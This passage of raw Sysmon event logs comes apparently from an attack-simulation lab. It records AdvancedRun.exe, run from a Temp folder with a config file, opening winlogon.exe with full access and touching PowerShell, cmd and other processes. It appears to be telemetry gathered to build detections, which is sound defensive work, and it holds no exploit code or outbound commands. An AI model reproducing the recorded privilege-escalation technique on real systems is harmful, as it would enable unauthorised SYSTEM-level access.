  ParentProcessGuid={834264DD-14CE-61EB-9F08-000000002702}  ParentProcessId=4792
  ParentImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ParentCommandLine="C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -run
  ParentUser=ATTACKRANGE\Administrator
  (Image is the SysWOW64 copy while CommandLine names System32: the 32-bit parent is subject to WOW64 file system redirection.)

[4080643] EID 7  20:17:57.471  PID 4792 (User=ATTACKRANGE\Administrator)  C:\Windows\SysWOW64\apphelp.dll  10.0.14393.4350 (rs1_release.210407-2154)  Application Compatibility Client Library  Apphelp  MD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0D

[4081255] EID 5 ProcessTerminated  UtcTime=20:18:02.352
  ProcessGuid={834264DD-14CE-61EB-9F08-000000002702}  ProcessId=4792  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  User=ATTACKRANGE\Administrator
10341000x80000000000000004080526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A108-000000002702}368C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080522Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.471{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\App